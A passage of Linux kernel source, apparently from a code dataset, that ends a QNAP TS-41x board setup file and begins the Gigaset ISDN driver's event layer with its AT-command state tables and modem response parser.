		qnap_ts41x_ge01_data.phy_addr = MV643XX_ETH_PHY_ADDR(1);
	}
	kirkwood_ge00_init(&qnap_ts41x_ge00_data);
	kirkwood_ge01_init(&qnap_ts41x_ge01_data);

	kirkwood_sata_init(&qnap_ts41x_sata_data);
	kirkwood_ehci_init();
	platform_device_register(&qnap_ts41x_button_device);

	pm_power_off = qnap_tsx1x_power_off;

	/* Expose the LCD/serial-console jumper state to userspace. */
	if (gpio_request(QNAP_TS41X_JUMPER_JP1, "JP1") == 0)
		gpio_export(QNAP_TS41X_JUMPER_JP1, 0);
}
/*
 * Late PCIe bring-up for TS-41x boards, run as a subsys_initcall so
 * it happens after the core machine init.
 */
static int __init ts41x_pci_init(void)
{
	if (machine_is_ts41x()) {
		u32 dev, rev;

		/*
		 * Without this explicit reset, the PCIe SATA controller
		 * (Marvell 88sx7042/sata_mv) is known to stop working
		 * after a few minutes.
		 */
		orion_pcie_reset((void __iomem *)PCIE_VIRT_BASE);

		/* The 6282 variant has a second PCIe port. */
		kirkwood_pcie_id(&dev, &rev);
		if (dev == MV88F6282_DEV_ID)
			kirkwood_pcie_init(KW_PCIE1 | KW_PCIE0);
		else
			kirkwood_pcie_init(KW_PCIE0);
	}

	return 0;
}
subsys_initcall(ts41x_pci_init);
MACHINE_START(TS41X, "QNAP TS-41x")
/* Maintainer: Martin Michlmayr <tbm@cyrius.com> */
.boot_params = 0x00000100,
.init_machine = qnap_ts41x_init,
.map_io = kirkwood_map_io,
.init_early = kirkwood_init_early,
.init_irq = kirkwood_init_irq,
.timer = &kirkwood_timer,
MACHINE_END
| gpl-2.0 |
coliby/terasic_MTL | drivers/isdn/gigaset/ev-layer.c | 2818 | 48217 | /*
* Stuff used by all variants of the driver
*
* Copyright (c) 2001 by Stefan Eilers,
* Hansjoerg Lipp <hjlipp@web.de>,
* Tilman Schmidt <tilman@imap.cc>.
*
* =====================================================================
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of
* the License, or (at your option) any later version.
* =====================================================================
*/
#include <linux/export.h>
#include "gigaset.h"
/* ========================================================== */
/* bit masks for pending commands */
#define PC_DIAL 0x001
#define PC_HUP 0x002
#define PC_INIT 0x004
#define PC_DLE0 0x008
#define PC_DLE1 0x010
#define PC_SHUTDOWN 0x020
#define PC_ACCEPT 0x040
#define PC_CID 0x080
#define PC_NOCID 0x100
#define PC_CIDMODE 0x200
#define PC_UMMODE 0x400
/* types of modem responses */
#define RT_NOTHING 0
#define RT_ZSAU 1
#define RT_RING 2
#define RT_NUMBER 3
#define RT_STRING 4
#define RT_ZCAU 6
/* Possible ASCII responses */
#define RSP_OK 0
#define RSP_ERROR 1
#define RSP_ZGCI 3
#define RSP_RING 4
#define RSP_ZVLS 5
#define RSP_ZCAU 6
/* responses with values to store in at_state */
/* - numeric */
#define RSP_VAR 100
#define RSP_ZSAU (RSP_VAR + VAR_ZSAU)
#define RSP_ZDLE (RSP_VAR + VAR_ZDLE)
#define RSP_ZCTP (RSP_VAR + VAR_ZCTP)
/* - string */
/* response codes for string-valued variables: offsets into the RSP_STR block */
#define RSP_STR (RSP_VAR + VAR_NUM)
#define RSP_NMBR (RSP_STR + STR_NMBR)
#define RSP_ZCPN (RSP_STR + STR_ZCPN)
#define RSP_ZCON (RSP_STR + STR_ZCON)
#define RSP_ZBC (RSP_STR + STR_ZBC)
#define RSP_ZHLC (RSP_STR + STR_ZHLC)
/* pseudo response codes (negative: never sent by the device itself) */
#define RSP_WRONG_CID -2 /* unknown cid in cmd */
#define RSP_INVAL -6 /* invalid response */
#define RSP_NODEV -9 /* device not connected */
#define RSP_NONE -19
#define RSP_STRING -20
#define RSP_NULL -21
#define RSP_INIT -27
#define RSP_ANY -26
#define RSP_LAST -28
/* actions for process_response */
#define ACT_NOTHING 0
#define ACT_SETDLE1 1
#define ACT_SETDLE0 2
#define ACT_FAILINIT 3
#define ACT_HUPMODEM 4
#define ACT_CONFIGMODE 5
#define ACT_INIT 6
#define ACT_DLE0 7
#define ACT_DLE1 8
#define ACT_FAILDLE0 9
#define ACT_FAILDLE1 10
#define ACT_RING 11
#define ACT_CID 12
#define ACT_FAILCID 13
#define ACT_SDOWN 14
#define ACT_FAILSDOWN 15
#define ACT_DEBUG 16
#define ACT_WARN 17
#define ACT_DIALING 18
#define ACT_ABORTDIAL 19
#define ACT_DISCONNECT 20
#define ACT_CONNECT 21
#define ACT_REMOTEREJECT 22
#define ACT_CONNTIMEOUT 23
#define ACT_REMOTEHUP 24
#define ACT_ABORTHUP 25
#define ACT_ICALL 26
#define ACT_ACCEPTED 27
#define ACT_ABORTACCEPT 28
#define ACT_TIMEOUT 29
#define ACT_GETSTRING 30
#define ACT_SETVER 31
#define ACT_FAILVER 32
#define ACT_GOTVER 33
#define ACT_TEST 34
#define ACT_ERROR 35
#define ACT_ABORTCID 36
#define ACT_ZCAU 37
#define ACT_NOTIFY_BC_DOWN 38
#define ACT_NOTIFY_BC_UP 39
#define ACT_DIAL 40
#define ACT_ACCEPT 41
/* NOTE(review): value 42 is skipped here — confirm whether intentional */
#define ACT_HUP 43
#define ACT_IF_LOCK 44
#define ACT_START 45
#define ACT_STOP 46
#define ACT_FAKEDLE0 47
#define ACT_FAKEHUP 48
#define ACT_FAKESDOWN 49
#define ACT_SHUTDOWN 50
#define ACT_PROC_CIDMODE 51
#define ACT_UMODESET 52
#define ACT_FAILUMODE 53
#define ACT_CMODESET 54
#define ACT_FAILCMODE 55
#define ACT_IF_VER 56
/* ACT_CMD + AT_xxx encodes "send prepared AT command number AT_xxx";
 * see the default branch of do_action() */
#define ACT_CMD 100
/* at command sequences */
#define SEQ_NONE 0
#define SEQ_INIT 100
#define SEQ_DLE0 200
#define SEQ_DLE1 250
#define SEQ_CID 300
#define SEQ_NOCID 350
#define SEQ_HUP 400
#define SEQ_DIAL 600
#define SEQ_ACCEPT 720
#define SEQ_SHUTDOWN 500
#define SEQ_CIDMODE 10
#define SEQ_UMMODE 11
/* 100: init, 200: dle0, 250:dle1, 300: get cid (dial), 350: "hup" (no cid),
 * 400: hup, 500: reset, 600: dial, 700: ring */

/* state machine table for responses received outside a connection (no CID).
 * Each row: match a response code within a ConState range (and optional
 * parameter value), then switch to new_ConState, arm a timeout, run the
 * listed actions and optionally send the given AT command string.
 * new_ConState/timeout of -1 mean "leave unchanged". */
struct reply_t gigaset_tab_nocid[] =
{
/* resp_code, min_ConState, max_ConState, parameter, new_ConState, timeout,
 * action, command */

	/* initialize device, set cid mode if possible */
	{RSP_INIT,	 -1,  -1, SEQ_INIT,		100,  1, {ACT_TIMEOUT} },

	{EV_TIMEOUT,	100, 100, -1,			101,  3, {0},	"Z\r"},
	{RSP_OK,	101, 103, -1,			120,  5, {ACT_GETSTRING},
								"+GMR\r"},

	{EV_TIMEOUT,	101, 101, -1,			102,  5, {0},	"Z\r"},
	{RSP_ERROR,	101, 101, -1,			102,  5, {0},	"Z\r"},

	{EV_TIMEOUT,	102, 102, -1,			108,  5, {ACT_SETDLE1},
								"^SDLE=0\r"},
	{RSP_OK,	108, 108, -1,			104, -1},
	{RSP_ZDLE,	104, 104,  0,			103,  5, {0},	"Z\r"},
	{EV_TIMEOUT,	104, 104, -1,			  0,  0, {ACT_FAILINIT} },
	{RSP_ERROR,	108, 108, -1,			  0,  0, {ACT_FAILINIT} },

	{EV_TIMEOUT,	108, 108, -1,			105,  2, {ACT_SETDLE0,
							  ACT_HUPMODEM,
							  ACT_TIMEOUT} },
	{EV_TIMEOUT,	105, 105, -1,			103,  5, {0},	"Z\r"},

	{RSP_ERROR,	102, 102, -1,			107,  5, {0},	"^GETPRE\r"},
	{RSP_OK,	107, 107, -1,			  0,  0, {ACT_CONFIGMODE} },
	{RSP_ERROR,	107, 107, -1,			  0,  0, {ACT_FAILINIT} },
	{EV_TIMEOUT,	107, 107, -1,			  0,  0, {ACT_FAILINIT} },

	{RSP_ERROR,	103, 103, -1,			  0,  0, {ACT_FAILINIT} },
	{EV_TIMEOUT,	103, 103, -1,			  0,  0, {ACT_FAILINIT} },

	{RSP_STRING,	120, 120, -1,			121, -1, {ACT_SETVER} },

	{EV_TIMEOUT,	120, 121, -1,			  0,  0, {ACT_FAILVER,
							  ACT_INIT} },
	{RSP_ERROR,	120, 121, -1,			  0,  0, {ACT_FAILVER,
							  ACT_INIT} },
	{RSP_OK,	121, 121, -1,			  0,  0, {ACT_GOTVER,
							  ACT_INIT} },
	{RSP_NONE,	121, 121, -1,			120,  0, {ACT_GETSTRING} },

	/* leave dle mode */
	{RSP_INIT,	  0,   0, SEQ_DLE0,		201,  5, {0},	"^SDLE=0\r"},
	{RSP_OK,	201, 201, -1,			202, -1},
	{RSP_ZDLE,	202, 202,  0,			  0,  0, {ACT_DLE0} },
	{RSP_NODEV,	200, 249, -1,			  0,  0, {ACT_FAKEDLE0} },
	{RSP_ERROR,	200, 249, -1,			  0,  0, {ACT_FAILDLE0} },
	{EV_TIMEOUT,	200, 249, -1,			  0,  0, {ACT_FAILDLE0} },

	/* enter dle mode */
	{RSP_INIT,	  0,   0, SEQ_DLE1,		251,  5, {0},	"^SDLE=1\r"},
	{RSP_OK,	251, 251, -1,			252, -1},
	{RSP_ZDLE,	252, 252,  1,			  0,  0, {ACT_DLE1} },
	{RSP_ERROR,	250, 299, -1,			  0,  0, {ACT_FAILDLE1} },
	{EV_TIMEOUT,	250, 299, -1,			  0,  0, {ACT_FAILDLE1} },

	/* incoming call */
	{RSP_RING,	 -1,  -1, -1,			 -1, -1, {ACT_RING} },

	/* get cid */
	{RSP_INIT,	  0,   0, SEQ_CID,		301,  5, {0},	"^SGCI?\r"},
	{RSP_OK,	301, 301, -1,			302, -1},
	{RSP_ZGCI,	302, 302, -1,			  0,  0, {ACT_CID} },
	{RSP_ERROR,	301, 349, -1,			  0,  0, {ACT_FAILCID} },
	{EV_TIMEOUT,	301, 349, -1,			  0,  0, {ACT_FAILCID} },

	/* enter cid mode */
	{RSP_INIT,	  0,   0, SEQ_CIDMODE,		150,  5, {0},	"^SGCI=1\r"},
	{RSP_OK,	150, 150, -1,			  0,  0, {ACT_CMODESET} },
	{RSP_ERROR,	150, 150, -1,			  0,  0, {ACT_FAILCMODE} },
	{EV_TIMEOUT,	150, 150, -1,			  0,  0, {ACT_FAILCMODE} },

	/* leave cid mode */
	{RSP_INIT,	  0,   0, SEQ_UMMODE,		160,  5, {0},	"Z\r"},
	{RSP_OK,	160, 160, -1,			  0,  0, {ACT_UMODESET} },
	{RSP_ERROR,	160, 160, -1,			  0,  0, {ACT_FAILUMODE} },
	{EV_TIMEOUT,	160, 160, -1,			  0,  0, {ACT_FAILUMODE} },

	/* abort getting cid */
	{RSP_INIT,	  0,   0, SEQ_NOCID,		  0,  0, {ACT_ABORTCID} },

	/* reset */
	{RSP_INIT,	  0,   0, SEQ_SHUTDOWN,		504,  5, {0},	"Z\r"},
	{RSP_OK,	504, 504, -1,			  0,  0, {ACT_SDOWN} },
	{RSP_ERROR,	501, 599, -1,			  0,  0, {ACT_FAILSDOWN} },
	{EV_TIMEOUT,	501, 599, -1,			  0,  0, {ACT_FAILSDOWN} },
	{RSP_NODEV,	501, 599, -1,			  0,  0, {ACT_FAKESDOWN} },

	{EV_PROC_CIDMODE, -1, -1, -1,			 -1, -1, {ACT_PROC_CIDMODE} },
	{EV_IF_LOCK,	 -1,  -1, -1,			 -1, -1, {ACT_IF_LOCK} },
	{EV_IF_VER,	 -1,  -1, -1,			 -1, -1, {ACT_IF_VER} },
	{EV_START,	 -1,  -1, -1,			 -1, -1, {ACT_START} },
	{EV_STOP,	 -1,  -1, -1,			 -1, -1, {ACT_STOP} },
	{EV_SHUTDOWN,	 -1,  -1, -1,			 -1, -1, {ACT_SHUTDOWN} },

	/* misc. */
	{RSP_ERROR,	 -1,  -1, -1,			 -1, -1, {ACT_ERROR} },
	{RSP_ZCAU,	 -1,  -1, -1,			 -1, -1, {ACT_ZCAU} },
	{RSP_NONE,	 -1,  -1, -1,			 -1, -1, {ACT_DEBUG} },
	{RSP_ANY,	 -1,  -1, -1,			 -1, -1, {ACT_WARN} },
	{RSP_LAST}
};
/* 600: start dialing, 650: dial in progress, 800: connection is up, 700: ring,
 * 400: hup, 750: accepted icall */

/* state machine table for responses received within a connection (with CID).
 * Same row layout as gigaset_tab_nocid above. */
struct reply_t gigaset_tab_cid[] =
{
/* resp_code, min_ConState, max_ConState, parameter, new_ConState, timeout,
 * action, command */

	/* dial */
	{EV_DIAL,	 -1,  -1, -1,			 -1, -1, {ACT_DIAL} },
	{RSP_INIT,	  0,   0, SEQ_DIAL,		601,  5, {ACT_CMD + AT_BC} },
	{RSP_OK,	601, 601, -1,			603,  5, {ACT_CMD + AT_PROTO} },
	{RSP_OK,	603, 603, -1,			604,  5, {ACT_CMD + AT_TYPE} },
	{RSP_OK,	604, 604, -1,			605,  5, {ACT_CMD + AT_MSN} },
	{RSP_NULL,	605, 605, -1,			606,  5, {ACT_CMD + AT_CLIP} },
	{RSP_OK,	605, 605, -1,			606,  5, {ACT_CMD + AT_CLIP} },
	{RSP_NULL,	606, 606, -1,			607,  5, {ACT_CMD + AT_ISO} },
	{RSP_OK,	606, 606, -1,			607,  5, {ACT_CMD + AT_ISO} },
	{RSP_OK,	607, 607, -1,			608,  5, {0},	"+VLS=17\r"},
	{RSP_OK,	608, 608, -1,			609, -1},
	{RSP_ZSAU,	609, 609, ZSAU_PROCEEDING,	610,  5, {ACT_CMD + AT_DIAL} },
	{RSP_OK,	610, 610, -1,			650,  0, {ACT_DIALING} },

	{RSP_ERROR,	601, 610, -1,			  0,  0, {ACT_ABORTDIAL} },
	{EV_TIMEOUT,	601, 610, -1,			  0,  0, {ACT_ABORTDIAL} },

	/* optional dialing responses */
	{EV_BC_OPEN,	650, 650, -1,			651, -1},
	{RSP_ZVLS,	609, 651, 17,			 -1, -1, {ACT_DEBUG} },
	{RSP_ZCTP,	610, 651, -1,			 -1, -1, {ACT_DEBUG} },
	{RSP_ZCPN,	610, 651, -1,			 -1, -1, {ACT_DEBUG} },
	{RSP_ZSAU,	650, 651, ZSAU_CALL_DELIVERED,	 -1, -1, {ACT_DEBUG} },

	/* connect */
	{RSP_ZSAU,	650, 650, ZSAU_ACTIVE,		800, -1, {ACT_CONNECT} },
	{RSP_ZSAU,	651, 651, ZSAU_ACTIVE,		800, -1, {ACT_CONNECT,
							  ACT_NOTIFY_BC_UP} },
	{RSP_ZSAU,	750, 750, ZSAU_ACTIVE,		800, -1, {ACT_CONNECT} },
	{RSP_ZSAU,	751, 751, ZSAU_ACTIVE,		800, -1, {ACT_CONNECT,
							  ACT_NOTIFY_BC_UP} },
	{EV_BC_OPEN,	800, 800, -1,			800, -1, {ACT_NOTIFY_BC_UP} },

	/* remote hangup */
	{RSP_ZSAU,	650, 651, ZSAU_DISCONNECT_IND,	  0,  0, {ACT_REMOTEREJECT} },
	{RSP_ZSAU,	750, 751, ZSAU_DISCONNECT_IND,	  0,  0, {ACT_REMOTEHUP} },
	{RSP_ZSAU,	800, 800, ZSAU_DISCONNECT_IND,	  0,  0, {ACT_REMOTEHUP} },

	/* hangup */
	{EV_HUP,	 -1,  -1, -1,			 -1, -1, {ACT_HUP} },
	{RSP_INIT,	 -1,  -1, SEQ_HUP,		401,  5, {0},	"+VLS=0\r"},
	{RSP_OK,	401, 401, -1,			402,  5},
	{RSP_ZVLS,	402, 402,  0,			403,  5},
	{RSP_ZSAU,	403, 403, ZSAU_DISCONNECT_REQ,	 -1, -1, {ACT_DEBUG} },
	{RSP_ZSAU,	403, 403, ZSAU_NULL,		  0,  0, {ACT_DISCONNECT} },
	{RSP_NODEV,	401, 403, -1,			  0,  0, {ACT_FAKEHUP} },
	{RSP_ERROR,	401, 401, -1,			  0,  0, {ACT_ABORTHUP} },
	{EV_TIMEOUT,	401, 403, -1,			  0,  0, {ACT_ABORTHUP} },
	{EV_BC_CLOSED,	  0,   0, -1,			  0, -1, {ACT_NOTIFY_BC_DOWN} },

	/* ring */
	{RSP_ZBC,	700, 700, -1,			 -1, -1, {0} },
	{RSP_ZHLC,	700, 700, -1,			 -1, -1, {0} },
	{RSP_NMBR,	700, 700, -1,			 -1, -1, {0} },
	{RSP_ZCPN,	700, 700, -1,			 -1, -1, {0} },
	{RSP_ZCTP,	700, 700, -1,			 -1, -1, {0} },
	{EV_TIMEOUT,	700, 700, -1,			720, 720, {ACT_ICALL} },
	{EV_BC_CLOSED,	720, 720, -1,			  0, -1, {ACT_NOTIFY_BC_DOWN} },

	/*accept icall*/
	{EV_ACCEPT,	 -1,  -1, -1,			 -1, -1, {ACT_ACCEPT} },
	{RSP_INIT,	720, 720, SEQ_ACCEPT,		721,  5, {ACT_CMD + AT_PROTO} },
	{RSP_OK,	721, 721, -1,			722,  5, {ACT_CMD + AT_ISO} },
	{RSP_OK,	722, 722, -1,			723,  5, {0},	"+VLS=17\r"},
	{RSP_OK,	723, 723, -1,			724,  5, {0} },
	{RSP_ZVLS,	724, 724, 17,			750, 50, {ACT_ACCEPTED} },
	{RSP_ERROR,	721, 729, -1,			  0,  0, {ACT_ABORTACCEPT} },
	{EV_TIMEOUT,	721, 729, -1,			  0,  0, {ACT_ABORTACCEPT} },
	{RSP_ZSAU,	700, 729, ZSAU_NULL,		  0,  0, {ACT_ABORTACCEPT} },
	{RSP_ZSAU,	700, 729, ZSAU_ACTIVE,		  0,  0, {ACT_ABORTACCEPT} },
	{RSP_ZSAU,	700, 729, ZSAU_DISCONNECT_IND,	  0,  0, {ACT_ABORTACCEPT} },

	{EV_BC_OPEN,	750, 750, -1,			751, -1},
	{EV_TIMEOUT,	750, 751, -1,			  0,  0, {ACT_CONNTIMEOUT} },

	/* B channel closed (general case) */
	{EV_BC_CLOSED,	 -1,  -1, -1,			 -1, -1, {ACT_NOTIFY_BC_DOWN} },

	/* misc. */
	{RSP_ZCON,	 -1,  -1, -1,			 -1, -1, {ACT_DEBUG} },
	{RSP_ZCAU,	 -1,  -1, -1,			 -1, -1, {ACT_ZCAU} },
	{RSP_NONE,	 -1,  -1, -1,			 -1, -1, {ACT_DEBUG} },
	{RSP_ANY,	 -1,  -1, -1,			 -1, -1, {ACT_WARN} },
	{RSP_LAST}
};
/* table mapping leading modem response keywords to response codes and
 * to the way their trailing parameter (if any) must be parsed */
static const struct resp_type_t {
	char *response;		/* keyword as sent by the device */
	int resp_code;		/* RSP_XXX event code */
	int type;		/* RT_XXX parameter parsing style */
}
resp_type[] =
{
	{"OK",		RSP_OK,		RT_NOTHING},
	{"ERROR",	RSP_ERROR,	RT_NOTHING},
	{"ZSAU",	RSP_ZSAU,	RT_ZSAU},
	{"ZCAU",	RSP_ZCAU,	RT_ZCAU},
	{"RING",	RSP_RING,	RT_RING},
	{"ZGCI",	RSP_ZGCI,	RT_NUMBER},
	{"ZVLS",	RSP_ZVLS,	RT_NUMBER},
	{"ZCTP",	RSP_ZCTP,	RT_NUMBER},
	{"ZDLE",	RSP_ZDLE,	RT_NUMBER},
	{"ZHLC",	RSP_ZHLC,	RT_STRING},
	{"ZBC",		RSP_ZBC,	RT_STRING},
	{"NMBR",	RSP_NMBR,	RT_STRING},
	{"ZCPN",	RSP_ZCPN,	RT_STRING},
	{"ZCON",	RSP_ZCON,	RT_STRING},
	{NULL,		0,		0}	/* sentinel */
};
/* table mapping the textual parameter of a ZSAU response to its
 * numeric ZSAU_XXX code; unmatched strings map to ZSAU_UNKNOWN */
static const struct zsau_resp_t {
	char *str;	/* parameter text after "ZSAU=" */
	int code;	/* corresponding ZSAU_XXX value */
}
zsau_resp[] =
{
	{"OUTGOING_CALL_PROCEEDING",	ZSAU_PROCEEDING},
	{"CALL_DELIVERED",		ZSAU_CALL_DELIVERED},
	{"ACTIVE",			ZSAU_ACTIVE},
	{"DISCONNECT_IND",		ZSAU_DISCONNECT_IND},
	{"NULL",			ZSAU_NULL},
	{"DISCONNECT_REQ",		ZSAU_DISCONNECT_REQ},
	{NULL,				ZSAU_UNKNOWN}	/* sentinel */
};
/* retrieve CID from parsed response
 * returns 0 if no CID, -1 if invalid CID, or CID value 1..65535
 * Note: the caller guarantees that s points just past a separator
 * character inside a larger buffer, so reading s[-1] is safe.
 */
static int cid_of_response(char *s)
{
	int value;

	/* a CID is only present when the last separator was ';' */
	if (s[-1] != ';')
		return 0;

	/* non-numeric trailing parameter: treat as "no CID" */
	if (kstrtoint(s, 10, &value))
		return 0;

	/* valid Siemens CIDs lie in 1..65535 */
	return (value >= 1 && value <= 65535) ? value : -1;
}
/**
 * gigaset_handle_modem_response() - process received modem response
 * @cs:		device descriptor structure.
 *
 * Called by asyncdata/isocdata if a block of data received from the
 * device must be processed as a modem command response. The data is
 * already in the cs structure.
 *
 * Splits the line at ';'/','/'=' separators, extracts an optional
 * trailing CID, looks up each response keyword in resp_type[] and
 * queues one event per recognized response on cs->events.
 */
void gigaset_handle_modem_response(struct cardstate *cs)
{
	unsigned char *argv[MAX_REC_PARAMS + 1];
	int params;
	int i, j;
	const struct resp_type_t *rt;
	const struct zsau_resp_t *zr;
	int curarg;
	unsigned long flags;
	unsigned next, tail, head;
	struct event_t *event;
	int resp_code;
	int param_type;
	int abort;
	size_t len;
	int cid;
	int rawstring;

	len = cs->cbytes;
	if (!len) {
		/* ignore additional LFs/CRs (M10x config mode or cx100) */
		gig_dbg(DEBUG_MCMD, "skipped EOL [%02X]", cs->respdata[0]);
		return;
	}
	/* NUL-terminate the received line in place */
	cs->respdata[len] = 0;
	argv[0] = cs->respdata;
	params = 1;
	if (cs->at_state.getstring) {
		/* getstring only allowed without cid at the moment */
		cs->at_state.getstring = 0;
		rawstring = 1;
		cid = 0;
	} else {
		/* parse line: record the start of each separator-delimited
		 * parameter in argv[] */
		for (i = 0; i < len; i++)
			switch (cs->respdata[i]) {
			case ';':
			case ',':
			case '=':
				if (params > MAX_REC_PARAMS) {
					dev_warn(cs->dev,
						 "too many parameters in response\n");
					/* need last parameter (might be CID) */
					params--;
				}
				argv[params++] = cs->respdata + i + 1;
			}
		rawstring = 0;
		/* a ';'-separated trailing number is the CID */
		cid = params > 1 ? cid_of_response(argv[params - 1]) : 0;
		if (cid < 0) {
			gigaset_add_event(cs, &cs->at_state, RSP_INVAL,
					  NULL, 0, NULL);
			return;
		}

		/* terminate each parameter by overwriting its separator */
		for (j = 1; j < params; ++j)
			argv[j][-1] = 0;

		gig_dbg(DEBUG_EVENT, "CMD received: %s", argv[0]);
		if (cid) {
			--params;
			gig_dbg(DEBUG_EVENT, "CID: %s", argv[params]);
		}
		gig_dbg(DEBUG_EVENT, "available params: %d", params - 1);
		for (j = 1; j < params; j++)
			gig_dbg(DEBUG_EVENT, "param %d: %s", j, argv[j]);
	}

	/* queue one event per recognized response on the event ring */
	spin_lock_irqsave(&cs->ev_lock, flags);
	head = cs->ev_head;
	tail = cs->ev_tail;

	abort = 1;
	curarg = 0;
	while (curarg < params) {
		next = (tail + 1) % MAX_EVENTS;
		if (unlikely(next == head)) {
			dev_err(cs->dev, "event queue full\n");
			break;
		}

		event = cs->events + tail;
		event->at_state = NULL;
		event->cid = cid;
		event->ptr = NULL;
		event->arg = NULL;
		tail = next;

		if (rawstring) {
			resp_code = RSP_STRING;
			param_type = RT_STRING;
		} else {
			/* look up the response keyword */
			for (rt = resp_type; rt->response; ++rt)
				if (!strcmp(argv[curarg], rt->response))
					break;

			if (!rt->response) {
				event->type = RSP_NONE;
				gig_dbg(DEBUG_EVENT,
					"unknown modem response: '%s'\n",
					argv[curarg]);
				break;
			}

			resp_code = rt->resp_code;
			param_type = rt->type;
			++curarg;
		}

		event->type = resp_code;

		/* parse the parameter(s) according to the response type */
		switch (param_type) {
		case RT_NOTHING:
			break;
		case RT_RING:
			if (!cid) {
				dev_err(cs->dev,
					"received RING without CID!\n");
				event->type = RSP_INVAL;
				abort = 1;
			} else {
				/* the CID itself is the RING's parameter */
				event->cid = 0;
				event->parameter = cid;
				abort = 0;
			}
			break;
		case RT_ZSAU:
			if (curarg >= params) {
				event->parameter = ZSAU_NONE;
				break;
			}
			for (zr = zsau_resp; zr->str; ++zr)
				if (!strcmp(argv[curarg], zr->str))
					break;
			event->parameter = zr->code;
			if (!zr->str)
				dev_warn(cs->dev,
					 "%s: unknown parameter %s after ZSAU\n",
					 __func__, argv[curarg]);
			++curarg;
			break;
		case RT_STRING:
			if (curarg < params) {
				/* ownership of the copy passes to the event */
				event->ptr = kstrdup(argv[curarg], GFP_ATOMIC);
				if (!event->ptr)
					dev_err(cs->dev, "out of memory\n");
				++curarg;
			}
			gig_dbg(DEBUG_EVENT, "string==%s",
				event->ptr ? (char *) event->ptr : "NULL");
			break;
		case RT_ZCAU:
			event->parameter = -1;
			if (curarg + 1 < params) {
				u8 type, value;

				/* two hex bytes: cause type and value */
				i = kstrtou8(argv[curarg++], 16, &type);
				j = kstrtou8(argv[curarg++], 16, &value);
				if (i == 0 && j == 0)
					event->parameter = (type << 8) | value;
			} else
				curarg = params - 1;
			break;
		case RT_NUMBER:
			if (curarg >= params ||
			    kstrtoint(argv[curarg++], 10, &event->parameter))
				event->parameter = -1;
			gig_dbg(DEBUG_EVENT, "parameter==%d", event->parameter);
			break;
		}

		/* ZDLE responses also update the DLE mode flag directly */
		if (resp_code == RSP_ZDLE)
			cs->dle = event->parameter;

		if (abort)
			break;
	}

	cs->ev_tail = tail;
	spin_unlock_irqrestore(&cs->ev_lock, flags);

	if (curarg != params)
		gig_dbg(DEBUG_EVENT,
			"invalid number of processed parameters: %d/%d",
			curarg, params);
}
EXPORT_SYMBOL_GPL(gigaset_handle_modem_response);
/* disconnect
 * process closing of connection associated with given AT state structure
 *
 * If the AT state has a B channel, the hardware close handler is invoked
 * and the LL is notified; otherwise the (temporary) AT state structure is
 * unlinked and freed, and *at_state_p is set to NULL.
 */
static void disconnect(struct at_state_t **at_state_p)
{
	unsigned long flags;
	struct bc_state *bcs = (*at_state_p)->bcs;
	struct cardstate *cs = (*at_state_p)->cs;

	spin_lock_irqsave(&cs->lock, flags);
	/* invalidate any in-flight command sequence for this AT state */
	++(*at_state_p)->seq_index;

	/* revert to selected idle mode */
	if (!cs->cidmode) {
		cs->at_state.pending_commands |= PC_UMMODE;
		gig_dbg(DEBUG_EVENT, "Scheduling PC_UMMODE");
		cs->commands_pending = 1;
	}
	spin_unlock_irqrestore(&cs->lock, flags);

	if (bcs) {
		/* B channel assigned: invoke hardware specific handler */
		cs->ops->close_bchannel(bcs);
		/* notify LL */
		if (bcs->chstate & (CHS_D_UP | CHS_NOTIFY_LL)) {
			bcs->chstate &= ~(CHS_D_UP | CHS_NOTIFY_LL);
			gigaset_isdn_hupD(bcs);
		}
	} else {
		/* no B channel assigned: just deallocate */
		spin_lock_irqsave(&cs->lock, flags);
		list_del(&(*at_state_p)->list);
		kfree(*at_state_p);
		*at_state_p = NULL;
		spin_unlock_irqrestore(&cs->lock, flags);
	}
}
/* get_free_channel
 * get a free AT state structure: either one of those associated with the
 * B channels of the Gigaset device, or if none of those is available,
 * a newly allocated one with bcs=NULL
 * The structure should be freed by calling disconnect() after use.
 * Returns NULL if allocation of a temporary structure fails.
 */
static inline struct at_state_t *get_free_channel(struct cardstate *cs,
						  int cid)
/* cids: >0: siemens-cid
 * 0: without cid
 * -1: no cid assigned yet
 */
{
	unsigned long flags;
	int i;
	struct at_state_t *ret;

	/* prefer a reservable B channel's built-in AT state */
	for (i = 0; i < cs->channels; ++i)
		if (gigaset_get_channel(cs->bcs + i) >= 0) {
			ret = &cs->bcs[i].at_state;
			ret->cid = cid;
			return ret;
		}

	/* all B channels busy: allocate a temporary AT state and link it
	 * into cs->temp_at_states under the card lock */
	spin_lock_irqsave(&cs->lock, flags);
	ret = kmalloc(sizeof(struct at_state_t), GFP_ATOMIC);
	if (ret) {
		gigaset_at_init(ret, NULL, cs, cid);
		list_add(&ret->list, &cs->temp_at_states);
	}
	spin_unlock_irqrestore(&cs->lock, flags);
	return ret;
}
/* mark device initialization as failed:
 * clear the pending init, fall back to the given operating mode, release
 * all reserved B channels, and turn any pending "get CID" requests into
 * "report no CID" so waiting callers are unblocked */
static void init_failed(struct cardstate *cs, int mode)
{
	struct at_state_t *at_state;
	int ch;

	cs->at_state.pending_commands &= ~PC_INIT;
	cs->mode = mode;
	cs->mstate = MS_UNINITIALIZED;
	gigaset_free_channels(cs);

	for (ch = 0; ch < cs->channels; ++ch) {
		at_state = &cs->bcs[ch].at_state;
		if (!(at_state->pending_commands & PC_CID))
			continue;
		at_state->pending_commands &= ~PC_CID;
		at_state->pending_commands |= PC_NOCID;
		cs->commands_pending = 1;
	}
}
/* schedule (re)initialization of the device:
 * set the new mode state, block B channel reservation, and flag PC_INIT
 * for the command processor; a no-op if PC_INIT is already pending */
static void schedule_init(struct cardstate *cs, int state)
{
	if (cs->at_state.pending_commands & PC_INIT) {
		gig_dbg(DEBUG_EVENT, "not scheduling PC_INIT again");
		return;
	}
	cs->mstate = state;
	cs->mode = M_UNKNOWN;
	gigaset_block_channels(cs);
	cs->at_state.pending_commands |= PC_INIT;
	gig_dbg(DEBUG_EVENT, "Scheduling PC_INIT");
	cs->commands_pending = 1;
}
/* send an AT command
 * adding the "AT" prefix, cid and DLE encapsulation as appropriate
 */
static void send_command(struct cardstate *cs, const char *cmd,
			 struct at_state_t *at_state)
{
	struct cmdbuf_t *cb;
	size_t size;
	int cid = at_state->cid;

	/* worst-case framing: DLE ( A T 1 2 3 4 5 <cmd> DLE ) \0 */
	size = strlen(cmd) + 12;
	cb = kmalloc(sizeof(struct cmdbuf_t) + size, GFP_ATOMIC);
	if (!cb) {
		dev_err(cs->dev, "%s: out of memory\n", __func__);
		return;
	}

